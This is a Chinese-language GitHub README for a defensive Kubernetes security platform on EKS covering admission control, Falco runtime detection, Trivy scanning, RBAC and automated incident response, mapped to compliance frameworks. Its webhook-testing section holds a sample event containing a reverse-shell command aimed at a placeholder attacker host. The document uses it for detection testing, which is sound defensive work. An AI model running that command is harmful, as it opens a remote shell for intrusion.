effieksa/k8s-security-platform

GitHub: effieksa/k8s-security-platform

面向 EKS 的生产级 Kubernetes 运行时安全平台,整合准入控制、威胁检测、漏洞扫描和自动化响应,覆盖 CIS/NIST/PCI DSS 合规要求。

Stars: 0 | Forks: 0

# Kubernetes 安全平台 [![Falco](https://img.shields.io/badge/Runtime_Security-Falco_0.37-00AEF3?logo=falco)](https://falco.org/) [![OPA](https://img.shields.io/badge/Admission_Control-OPA_Gatekeeper-4B5EC2?logo=openpolicyagent)](https://open-policy-agent.github.io/gatekeeper/) [![Kyverno](https://img.shields.io/badge/Policy_Engine-Kyverno-0059A1)](https://kyverno.io/) [![Trivy](https://img.shields.io/badge/Vulnerability_Scan-Trivy_Operator-1904DA)](https://trivy.dev/) [![MITRE](https://img.shields.io/badge/Framework-MITRE_ATT%26CK-red)](https://attack.mitre.org/matrices/enterprise/containers/) [![CIS](https://img.shields.io/badge/Benchmark-CIS_Kubernetes_1.8-blue)](https://www.cisecurity.org/benchmark/kubernetes) 适用于 EKS 的生产级 Kubernetes 运行时安全平台。在准入控制、运行时威胁检测、持续漏洞扫描和自动化事件响应等方面实施纵深防御——映射到 MITRE ATT&CK for Containers、CIS Kubernetes Benchmark 1.8、NIST 800-53 和 PCI DSS。 ## 安全架构 大多数容器安全侧重于 CI/CD 流水线——在镜像部署前进行扫描。本平台覆盖部署**之后**发生的事情:在运行时检测威胁、在准入时执行策略、持续扫描运行中的工作负载以及自动响应事件。 ``` ┌─────────────────────────────────────────────────────────────────────┐ │ DEFENSE IN DEPTH LAYERS │ │ │ │ Layer 1 — ADMISSION CONTROL (prevent bad configs entering cluster) │ │ ┌────────────────────────┐ ┌──────────────────────────────────┐ │ │ │ OPA Gatekeeper │ │ Kyverno │ │ │ │ - No privileged pods │ │ - Verify Cosign signatures │ │ │ │ - Approved registries│ │ - Disallow :latest tag │ │ │ │ - Required labels │ │ - Drop ALL capabilities │ │ │ │ - Resource limits │ │ - Require seccomp profile │ │ │ │ - Non-root required │ │ - Auto-generate NetworkPolicies│ │ │ └────────────────────────┘ └──────────────────────────────────┘ │ │ │ │ Layer 2 — RUNTIME DETECTION (detect threats in running containers) │ │ ┌─────────────────────────────────────────────────────────────┐ │ │ │ Falco (eBPF-based, every node via DaemonSet) │ │ │ │ - Crypto mining processes MITRE T1496 │ │ │ │ - Reverse shell attempts MITRE T1059 │ │ │ │ - Container privilege escalation MITRE T1611 │ │ │ │ - Sensitive file access MITRE T1552 │ │ │ │ - Package manager execution MITRE T1190 │ │ │ │ - Network scanning tools MITRE T1046 │ │ │ │ - kubectl exec detection MITRE T1609 │ │ │ │ - K8s API anomalies (anonymous access, secret reads) │ │ │ └─────────────────────────────────────────────────────────────┘ │ │ │ │ Layer 3 — CONTINUOUS SCANNING (catch new CVEs post-deployment) │ │ ┌─────────────────────────────────────────────────────────────┐ │ │ │ Trivy Operator (scans all running workloads continuously) │ │ │ │ - VulnerabilityReport per workload │ │ │ │ - ConfigAuditReport (K8s misconfigurations) │ │ │ │ - ExposedSecretReport (secrets in images) │ │ │ │ - RbacAssessmentReport │ │ │ │ - Prometheus metrics → alerts on new CRITICAL CVEs │ │ │ └─────────────────────────────────────────────────────────────┘ │ │ │ │ Layer 4 — AUTOMATED RESPONSE (contain threats faster than humans) │ │ ┌─────────────────────────────────────────────────────────────┐ │ │ │ Falco → Falco Sidekick → auto-response.py webhook │ │ │ │ - Label pod as quarantined │ │ │ │ - Apply network isolation (deny all ingress/egress) │ │ │ │ - Capture forensic snapshot → S3 │ │ │ │ - Alert Slack + PagerDuty with full context │ │ │ │ - Optionally delete pod (restart from clean image) │ │ │ └─────────────────────────────────────────────────────────────┘ │ │ │ │ Layer 5 — AUDIT & COMPLIANCE │ │ ┌─────────────────────────────────────────────────────────────┐ │ │ │ Kubernetes Audit Policy + RBAC Hardening │ │ │ │ - Captures secret access, exec, privilege escalation │ │ │ │ - Least-privilege roles: security-auditor, developer, │ │ │ │ cicd-deployer, incident-responder │ │ │ │ - Prometheus alerts on RBAC anomalies │ │ │ └─────────────────────────────────────────────────────────────┘ │ └─────────────────────────────────────────────────────────────────────┘ ``` ## 合规覆盖范围 | 控制措施 | CIS K8s 1.8 | NIST 800-53 | PCI DSS | MITRE ATT&CK | |---|---|---|---|---| | 禁止特权容器 | 5.2.1 | AC-6 | 2.2 | T1611 | | 非 Root 容器 | 5.2.6 | AC-6 | 2.2 | T1548 | | 只读根文件系统 | 5.2.8 | CM-7 | 2.2 | T1070 | | 丢弃所有能力 | 5.2.9 | AC-6 | 2.2 | T1548 | | 仅限批准的注册表 | — | CM-7 | 6.3 | T1525 | | 必需标签 | — | CM-8 | — | — | | 网络策略 | 5.3.2 | SC-7 | 1.3 | T1046 | | 挖矿检测 | — | SI-4 | 11.4 | T1496 | | Shell 生成检测 | — | SI-4 | 11.4 | T1059 | | Secret 访问审计 | 3.2.1 | AU-2 | 10.2 | T1552 | | 权限提升检测 | — | AU-2 | 10.2 | T1611 | | 最小权限 RBAC | 5.1.1 | AC-6 | 7.1 | — | | 审计日志 | 3.2.1 | AU-2 | 10.2 | — | | 持续 CVE 扫描 | — | SI-2 | 6.3 | — | | 镜像签名验证 | — | CM-14 | 6.3 | T1525 | ## 仓库结构 ``` k8s-security-platform/ +-- README.md +-- falco/ | +-- rules/enterprise-rules.yaml # 15 custom MITRE-mapped detection rules | +-- config/falco-values.yaml # Falco + Sidekick Helm config +-- gatekeeper/ | +-- constraint-templates/templates.yaml # 7 Rego policy templates | +-- constraints/constraints.yaml # Constraint instances + exemptions +-- kyverno/ | +-- policies/policies.yaml # Cosign verification, capabilities, seccomp +-- trivy-operator/ | +-- values.yaml # Continuous CVE scanning config +-- rbac/ | +-- rbac.yaml # Least-privilege roles + bindings +-- audit/ | +-- audit-policy.yaml # K8s audit policy (API server) +-- alerting/ | +-- prometheus/security-alerts.yaml # Prometheus security alert rules +-- scripts/ | +-- bootstrap.sh # One-command cluster security setup | +-- auto-response.py # Automated incident response webhook ``` ## 快速开始 ### 使用一条命令安装所有组件: ``` ./scripts/bootstrap.sh \ --cluster-name my-eks-cluster \ --region us-east-1 \ --slack-webhook https://hooks.slack.com/services/xxx/yyy/zzz ``` ### 或单独安装各组件: ``` # OPA Gatekeeper helm upgrade --install gatekeeper gatekeeper/gatekeeper \ -n gatekeeper-system --create-namespace \ --set replicas=3 --wait kubectl apply -f gatekeeper/constraint-templates/templates.yaml sleep 15 # Wait for CRDs kubectl apply -f gatekeeper/constraints/constraints.yaml # Kyverno helm upgrade --install kyverno kyverno/kyverno \ -n kyverno --create-namespace --wait kubectl apply -f kyverno/policies/policies.yaml # Falco helm upgrade --install falco falcosecurity/falco \ -n falco --create-namespace \ --values falco/config/falco-values.yaml --wait # Trivy Operator helm upgrade --install trivy-operator aqua/trivy-operator \ -n trivy-system --create-namespace \ --values trivy-operator/values.yaml --wait # RBAC + Audit kubectl apply -f rbac/rbac.yaml kubectl apply -f alerting/prometheus/security-alerts.yaml ``` ## 验证平台 ### 检查 Gatekeeper 是否正在执行策略: ``` # 尝试部署特权 pod — 应被拒绝 kubectl run privileged-test \ --image=nginx \ --overrides='{"spec":{"containers":[{"name":"nginx","image":"nginx","securityContext":{"privileged":true}}]}}' # 预期: Error from server: admission webhook denied # 检查所有 constraints kubectl get constraints kubectl describe k8snoprivilegedcontainer no-privileged-containers ``` ### 触发 Falco 规则以进行测试: ``` # 在容器中生成 shell (触发 "Shell Spawned in Container" 规则) kubectl run test-pod --image=ubuntu --restart=Never --command -- sleep 3600 kubectl exec test-pod -- /bin/bash -c "echo test" # 监控 Falco 事件 kubectl logs -n falco -l app=falco --tail=20 -f ``` ### 检查 Trivy 漏洞报告: ``` # 查看所有 vulnerability reports kubectl get vulnerabilityreports -A # 获取特定 workload 的详细信息 kubectl describe vulnerabilityreport -n devsecops-prod # 查找集群中所有 CRITICAL CVEs kubectl get vulnerabilityreports -A -o json | \ jq '.items[] | select(.report.summary.criticalCount > 0) | {namespace: .metadata.namespace, name: .metadata.name, critical: .report.summary.criticalCount}' ``` ## Falco 规则参考 | 规则 | MITRE 战术 | MITRE 技术 | 优先级 | |---|---|---|---| | 检测到挖矿进程 | Impact | T1496 | CRITICAL | | 反向 Shell 尝试 | Execution | T1059 | CRITICAL | | Exec 进入运行中的容器 | Lateral Movement | T1609 | CRITICAL | | 创建了特权 Pod | Privilege Escalation | T1611 | CRITICAL | | 匿名访问 K8s API | Initial Access | T1190 | CRITICAL | | 容器权限提升 | Privilege Escalation | T1611 | HIGH | | 敏感文件访问 | Credential Access | T1552 | HIGH | | 容器内生成 Shell | Execution | T1059 | HIGH | | 检测到网络扫描工具 | Discovery | T1046 | HIGH | | 日志文件删除 | Defense Evasion | T1070 | HIGH | | 设置了 Setuid/Setgid 位 | Privilege Escalation | T1548 | HIGH | | 意外用户访问 K8s Secret | Credential Access | T1552 | HIGH | | 读取服务账号 Token | Credential Access | T1552 | MEDIUM | | 执行了包管理器 | Execution | T1190 | MEDIUM | ## 自动化事件响应 当 Falco 检测到 CRITICAL 事件时,响应 webhook 会: 1. **将 Pod 标记**为 `security.enterprise.com/quarantined: true` - 立即将其从 Service 端点中移除(流量停止) - 使受损情况对 `kubectl get pods` 可见 2. **应用隔离 NetworkPolicy** —— 拒绝所有进出该 Pod 的流量 3. **捕获取证快照** —— 完整的 Pod 规范、最后 500 行日志、K8s 事件 —— 使用 KMS 加密保存到 S3 4. **向 Slack + PagerDuty 发送警报**,包含完整上下文(Pod、镜像、命令、命名空间) 5. **可选删除 Pod**(设置 `AUTO_DELETE_PODS=true`)—— K8s 从干净镜像重新启动它 ``` # 在本地运行 response webhook 进行测试 export SLACK_TOKEN=xoxb-... export S3_FORENSICS_BUCKET=my-forensics-bucket python3 scripts/auto-response.py --server --port 9090 # 使用 sample event 进行测试 curl -X POST http://localhost:9090/falco \ -H "Content-Type: application/json" \ -d '{"rule":"Reverse Shell Attempt","priority":"CRITICAL","output_fields":{"k8s.pod.name":"test-pod","k8s.ns.name":"default","container.image.repository":"nginx","proc.cmdline":"bash -i >& /dev/tcp/evil.com/4444 0>&1"}}' ``` ## Runbook ### 调查 Falco CRITICAL 警报 ``` # 1. 查找被隔离的 pod kubectl get pods -A -l security.enterprise.com/quarantined=true # 2. 获取隔离原因 kubectl get pod -n \ -o jsonpath='{.metadata.annotations}' # 3. 从 S3 获取取证日志 aws s3 ls s3://forensics-bucket/falco-events/ --recursive aws s3 cp s3://forensics-bucket/falco-events///.json /tmp/forensics.json cat /tmp/forensics.json | jq . # 4. 调查结束后 — 移除隔离并删除 pod kubectl delete networkpolicy quarantine- -n kubectl delete pod -n ``` ### 检查集群内的 OPA 策略违规 ``` kubectl get constraintpodstatuses -A kubectl describe k8sallowedrepos approved-registries-only ``` ### 查看命名空间的 Trivy 报告 ``` kubectl get vulnerabilityreports -n -o wide kubectl get configauditreports -n -o wide ``` ## 许可证 MIT
标签:CIS Kubernetes 基准, Cloudflare, Cosign 镜像验证, CVE 检测, DevSecOps, Docker镜像, EKS, Falco, Force Graph, JSONLines, Kubernetes 安全, MITRE ATT&CK, NIST 800-53, OPA Gatekeeper, PCI DSS, Pod 隔离, Prometheus 监控, PyVis, Runtime Security, StruQ, Trivy Operator, Web截图, 上游代理, 动态调试, 合规性审计, 告警系统, 子域名突变, 容器安全, 敏感词过滤, 数据处理, 模型鲁棒性, 深度防御, 策略引擎, 网络安全挑战, 自动取证, 自定义请求头, 逆向工具, 零信任